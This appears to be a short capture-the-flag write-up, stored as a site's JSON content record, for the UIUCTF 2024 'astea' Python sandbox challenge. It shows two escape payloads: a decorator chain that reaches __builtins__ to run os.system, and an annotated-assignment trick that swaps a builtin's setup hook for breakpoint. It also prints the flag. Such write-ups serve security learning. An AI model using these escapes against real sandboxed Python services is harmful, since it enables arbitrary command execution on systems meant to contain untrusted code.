{"_path":"/ctf/2024-uiuctf/misc/astea","_dir":"misc","_draft":false,"_partial":false,"_locale":"","title":"","description":"We are not allowed to use the following expressions in python: assign, call, import, import from, binary operation (+-/ etc).","created":"2024-06-29T00:39","updated":"2024-08-05T19:34","tags":["AST"],"readingTime":{"text":"1 min read","minutes":0.415,"time":24900,"words":83},"body":{"type":"root","children":[{"type":"element","tag":"p","props":{},"children":[{"type":"text","value":"We are not allowed to use the following expressions in python: "},{"type":"element","tag":"strong","props":{},"children":[{"type":"text","value":"assign"}]},{"type":"text","value":", "},{"type":"element","tag":"strong","props":{},"children":[{"type":"text","value":"call"}]},{"type":"text","value":", "},{"type":"element","tag":"strong","props":{},"children":[{"type":"text","value":"import"}]},{"type":"text","value":", "},{"type":"element","tag":"strong","props":{},"children":[{"type":"text","value":"import from"}]},{"type":"text","value":", "},{"type":"element","tag":"strong","props":{},"children":[{"type":"text","value":"binary operation (+-/ etc)"}]},{"type":"text","value":"."}]},{"type":"element","tag":"p","props":{},"children":[{"type":"text","value":"First thing that came to mind were function decorators."}]},{"type":"element","tag":"pre","props":{"className":"language-python shiki shiki-themes one-light one-dark-pro monokai","code":"@safe_import.__globals__['__builtins__'].exec\n@lambda x: 'safe_import.__globals__[\"__builtins__\"].__import__(\"os\").system(\"ls\")'\ndef x(): 0\n","language":"python","meta":"","style":""},"children":[{"type":"element","tag":"code","props":{"__ignoreMap":""},"children":[{"type":"element","tag":"span","props":{"class":"line","line":1},"children":[{"type":"element","tag":"span","props":{"style":"--shiki-default:#4078F2;--shiki-dark:#61AFEF;--shiki-sepia:#A6E22E"},"children":[{"type":"text","value":"@safe_import"}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#4078F2;--shiki-dark:#ABB2BF;--shiki-sepia:#A6E22E"},"children":[{"type":"text","value":"."}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#4078F2;--shiki-dark:#61AFEF;--shiki-sepia:#A6E22E"},"children":[{"type":"text","value":"__globals__"}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:white;--shiki-dark:#FFFFFF;--shiki-sepia:#F44747"},"children":[{"type":"text","value":"['__builtins__'].exec\n"}]}]},{"type":"element","tag":"span","props":{"class":"line","line":2},"children":[{"type":"element","tag":"span","props":{"style":"--shiki-default:#4078F2;--shiki-dark:#61AFEF;--shiki-sepia:#A6E22E"},"children":[{"type":"text","value":"@lambda"}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#4078F2;--shiki-dark:#61AFEF;--shiki-sepia:#A6E22E"},"children":[{"type":"text","value":" x"}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:white;--shiki-dark:#FFFFFF;--shiki-sepia:#F44747"},"children":[{"type":"text","value":": 'safe_import.__globals__[\"__builtins__\"].__import__(\"os\").system(\"ls\")'\n"}]}]},{"type":"element","tag":"span","props":{"class":"line","line":3},"children":[{"type":"element","tag":"span","props":{"style":"--shiki-default:#A626A4;--shiki-default-font-style:inherit;--shiki-dark:#C678DD;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic"},"children":[{"type":"text","value":"def"}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#4078F2;--shiki-dark:#61AFEF;--shiki-sepia:#A6E22E"},"children":[{"type":"text","value":" x"}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#383A42;--shiki-dark:#ABB2BF;--shiki-sepia:#F8F8F2"},"children":[{"type":"text","value":"(): "}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#986801;--shiki-dark:#D19A66;--shiki-sepia:#AE81FF"},"children":[{"type":"text","value":"0\n"}]}]}]}]},{"type":"element","tag":"p","props":{},"children":[{"type":"text","value":"This is a working payload but it's 3 lines."}]},{"type":"element","tag":"p","props":{},"children":[{"type":"text","value":"So I tried other things such as replacing "},{"type":"element","tag":"code","props":{},"children":[{"type":"text","value":"safe_import"}]},{"type":"text","value":" with my own function but they all failed."}]},{"type":"element","tag":"p","props":{},"children":[{"type":"text","value":"Then my teammates solved it with "},{"type":"element","tag":"strong","props":{},"children":[{"type":"text","value":"AnnAssign"}]},{"type":"text","value":"."}]},{"type":"element","tag":"pre","props":{"className":"language-python shiki shiki-themes one-light one-dark-pro monokai","code":"builtins: \"\" = safe_import.__globals__[\"__builtins__\"] license: \"\" = builtins.license license._Printer__setup: \"\" = builtins.breakpoint f\"{license}\"\n\n# uiuctf{maybe_we_shouldnt_sandbox_python_2691d6c1}\n","language":"python","meta":"","style":""},"children":[{"type":"element","tag":"code","props":{"__ignoreMap":""},"children":[{"type":"element","tag":"span","props":{"class":"line","line":1},"children":[{"type":"element","tag":"span","props":{"style":"--shiki-default:#383A42;--shiki-dark:#ABB2BF;--shiki-sepia:#F8F8F2"},"children":[{"type":"text","value":"builtins: "}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#50A14F;--shiki-dark:#98C379;--shiki-sepia:#E6DB74"},"children":[{"type":"text","value":"\"\""}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#383A42;--shiki-dark:#56B6C2;--shiki-sepia:#F92672"},"children":[{"type":"text","value":" ="}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#383A42;--shiki-dark:#ABB2BF;--shiki-sepia:#F8F8F2"},"children":[{"type":"text","value":" safe_import."}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#E45649;--shiki-dark:#E06C75;--shiki-sepia:#F8F8F2"},"children":[{"type":"text","value":"__globals__"}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#383A42;--shiki-dark:#ABB2BF;--shiki-sepia:#F8F8F2"},"children":[{"type":"text","value":"["}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#50A14F;--shiki-dark:#98C379;--shiki-sepia:#E6DB74"},"children":[{"type":"text","value":"\"__builtins__\""}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#383A42;--shiki-dark:#ABB2BF;--shiki-sepia:#F8F8F2"},"children":[{"type":"text","value":"] "}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#0184BC;--shiki-dark:#56B6C2;--shiki-sepia:#66D9EF"},"children":[{"type":"text","value":"license"}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#383A42;--shiki-dark:#ABB2BF;--shiki-sepia:#F8F8F2"},"children":[{"type":"text","value":": "}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#50A14F;--shiki-dark:#98C379;--shiki-sepia:#E6DB74"},"children":[{"type":"text","value":"\"\""}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#383A42;--shiki-dark:#56B6C2;--shiki-sepia:#F92672"},"children":[{"type":"text","value":" ="}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#383A42;--shiki-dark:#ABB2BF;--shiki-sepia:#F8F8F2"},"children":[{"type":"text","value":" builtins.license "}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#0184BC;--shiki-dark:#56B6C2;--shiki-sepia:#66D9EF"},"children":[{"type":"text","value":"license"}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#383A42;--shiki-dark:#ABB2BF;--shiki-sepia:#F8F8F2"},"children":[{"type":"text","value":"._Printer__setup: "}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#50A14F;--shiki-dark:#98C379;--shiki-sepia:#E6DB74"},"children":[{"type":"text","value":"\"\""}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#383A42;--shiki-dark:#56B6C2;--shiki-sepia:#F92672"},"children":[{"type":"text","value":" ="}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#383A42;--shiki-dark:#ABB2BF;--shiki-sepia:#F8F8F2"},"children":[{"type":"text","value":" builtins.breakpoint "}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#A626A4;--shiki-default-font-style:inherit;--shiki-dark:#C678DD;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic"},"children":[{"type":"text","value":"f"}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#50A14F;--shiki-dark:#98C379;--shiki-sepia:#E6DB74"},"children":[{"type":"text","value":"\""}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#986801;--shiki-dark:#D19A66;--shiki-sepia:#AE81FF"},"children":[{"type":"text","value":"{"}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#0184BC;--shiki-dark:#56B6C2;--shiki-sepia:#66D9EF"},"children":[{"type":"text","value":"license"}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#986801;--shiki-dark:#D19A66;--shiki-sepia:#AE81FF"},"children":[{"type":"text","value":"}"}]},{"type":"element","tag":"span","props":{"style":"--shiki-default:#50A14F;--shiki-dark:#98C379;--shiki-sepia:#E6DB74"},"children":[{"type":"text","value":"\"\n"}]}]},{"type":"element","tag":"span","props":{"class":"line","line":2},"children":[{"type":"element","tag":"span","props":{"emptyLinePlaceholder":true},"children":[{"type":"text","value":"\n"}]}]},{"type":"element","tag":"span","props":{"class":"line","line":3},"children":[{"type":"element","tag":"span","props":{"style":"--shiki-default:#A0A1A7;--shiki-default-font-style:italic;--shiki-dark:#7F848E;--shiki-dark-font-style:italic;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit"},"children":[{"type":"text","value":"# uiuctf{maybe_we_shouldnt_sandbox_python_2691d6c1}\n"}]}]}]}]},{"type":"element","tag":"p","props":{},"children":[{"type":"text","value":"Never knew python had such a function."}]},{"type":"element","tag":"style","props":{},"children":[{"type":"text","value":"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}"}]}],"toc":{"title":"","searchDepth":2,"depth":2,"links":[]}},"_type":"markdown","_id":"content:ctf:2024-uiuctf:misc:astea:index.md","_source":"content","_file":"ctf/2024-uiuctf/misc/astea/index.md","_stem":"ctf/2024-uiuctf/misc/astea/index","_extension":"md"}